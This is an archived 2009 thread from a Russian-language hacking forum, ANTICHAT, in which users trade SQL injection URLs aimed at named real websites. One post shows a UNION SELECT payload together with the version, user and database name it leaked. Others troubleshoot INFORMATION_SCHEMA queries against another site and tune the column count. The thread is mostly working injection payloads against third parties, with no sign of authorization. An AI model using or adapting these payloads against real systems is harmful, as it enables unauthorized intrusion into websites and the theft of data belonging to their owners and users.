ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.01.2009, 23:16
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме: 861008
Репутация:
58
|
|
http://www.reciprodate.com/home.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x7c,version(),user(),da tabase()),22,23,24,25/*
4.0.27-standard|reciprodate@localhost|reciprodate
|
|
|

12.01.2009, 03:11
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме: 103485
Репутация:
4
|
|
Мужики, а что можна с такой ошибкой сделать?
http://news.qs.kiev.ua/lenta/s.php?s=1'
|
|
|

12.01.2009, 04:41
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
тут вроде фильтрация стоит у меня ничё не прошло...
|
|
|

12.01.2009, 08:05
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме: 103485
Репутация:
4
|
|
А такой вопрос.
Сайт в локалке у нас...есть скуль
Код:
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх
|
|
|

12.01.2009, 08:09
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме: 3750406
Репутация:
271
|
|
vakula
version() - за место 3его поля.
|
|
|

12.01.2009, 08:29
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме: 103485
Репутация:
4
|
|
Сообщение от a1ex
vakula
version() - за место 3его поля.
игнорирует, исходную показывает. а если ошибку сделаю или не в то поле...тогда показывает что ошибка.
|
|
|

12.01.2009, 08:30
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от vakula
А такой вопрос.
Сайт в локалке у нас...есть скуль
Код:
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх
1. Попробуй:
Код:
http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
2. Возможно, там просто нету вывода.
|
|
|

12.01.2009, 08:35
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме: 103485
Репутация:
4
|
|
Сообщение от R1dex
1. Попробуй:
Код:
http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
2. Возможно, там просто нету вывода.
пустота, а раньше показывало...убрали небось
p.s. дай линк где описывается поиск уязвимостей
спс
|
|
|

12.01.2009, 08:38
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме: 3750406
Репутация:
271
|
|
Сообщение от vakula
пустота, а раньше показывало...убрали небось
p.s. дай линк где описывается поиск уязвимостей
спс
Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. 
|
|
|

12.01.2009, 08:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|